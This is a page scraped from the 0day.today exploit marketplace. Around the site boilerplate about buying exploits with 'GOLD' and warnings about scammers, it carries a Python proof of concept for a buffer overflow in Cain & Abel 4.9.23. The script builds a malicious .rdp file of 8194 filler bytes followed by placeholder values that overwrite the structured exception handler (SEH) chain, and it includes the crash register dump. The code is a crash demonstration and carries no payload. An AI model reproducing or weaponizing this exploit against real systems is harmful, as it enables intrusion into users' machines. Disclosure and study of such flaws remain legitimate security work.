0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cain & Abel 4.9.23 (rdp file) Buffer Overflow PoC
================================================= Cain & Abel 4.9.23 (rdp file) Buffer Overflow PoC ================================================= # exploit.py ########################################################## # Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC # (other versions may also affected) # By:Encrypt3d.M!nd # encrypt3d.blogspot.com # # Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder ########################################################## # # Description: # When Using Remote Desktop Password Decoder in Cain and # Importing ".rdp" file contains long Chars(ex:8250 chars) # The Program Will crash.And The Following Happen: # # EAX:41414141 ECX:7C832648 EDX:41414142 EBX:00000000 # ESP:0012BCD4 EBP:0012BCD4 ESI:001F07A8 EDI:00000001 # EIP:7E43C201 USER32.7E43C201 # # Access violation When Reading [41414141] # # And Also The Pointer to next SEH record and SE Handler # Will gonna BE Over-wrote # # This Poc Will Gonna Overwrite the Pointer to next SEH # With"42424242" and The SE Handler with"43434343" # ########################################################## chars = "A"*8194 ptns = "B"*4 shan = "C"*4 chars2 = "A"*200 exp=open('cain.rdp','w') exp.write(chars+ptns+shan+chars2) exp.close() # 0day.today [2024-12-25] #